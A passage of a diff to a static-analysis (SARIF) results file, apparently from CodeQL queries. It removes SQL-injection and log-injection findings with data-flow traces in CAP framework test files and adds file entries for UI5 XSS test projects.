"location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 50, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 44, - "endColumn" : 56 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 19, - "endColumn" : 57 - } - }, - "message" : { - "text" : "SELECT. ... book}`)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 11, - "endColumn" : 57 - } - }, - "message" : { - "text" : "query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "query" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b41554298e90b620:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 58, - "endColumn" : 62 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... book}`)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "967d7be3edc97a9e:1", - "primaryLocationStartColumnFingerprint" : "30" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 57 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 45, - "endColumn" : 57 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 20, - "endColumn" : 58 - } - }, - "message" : { - "text" : "SELECT. ... + book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 11, - "endColumn" : 58 - } - }, - "message" : { - "text" : "query2" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - }, - "message" : { - "text" : "query2" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1c132adaa6986472:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 60, - "endColumn" : 64 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... + book)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "144d55d233768c80:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 59, - "endColumn" : 63 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 17, - "endColumn" : 63 - } - }, - "message" : { - "text" : "CQL`SEL ... + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 11, - "endColumn" : 63 - } - }, - "message" : { - "text" : "cqn" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "cqn" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 56, - "endColumn" : 60 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 32, - "endColumn" : 60 - } - }, - "message" : { - "text" : "`SELECT ... + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 18, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cds.par ... + book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 30, - "startColumn" : 11, - "endColumn" : 61 - } - }, - "message" : { - "text" : "cqn1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - }, - "message" : { - "text" : "cqn1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "eae426bf8fad0192:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 25, - "endColumn" : 29 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 11, - "startColumn" : 16, - "endColumn" : 29 - } - }, - "message" : { - "text" : "\"CAP:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } }, { - "ruleId" : "js/cap-log-injection", - "rule" : { - "id" : "js/cap-log-injection", - "index" : 1, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 18, - "startColumn" : 47, - "endColumn" : 48 - } - } - } ], - "partialFingerprints" : { - 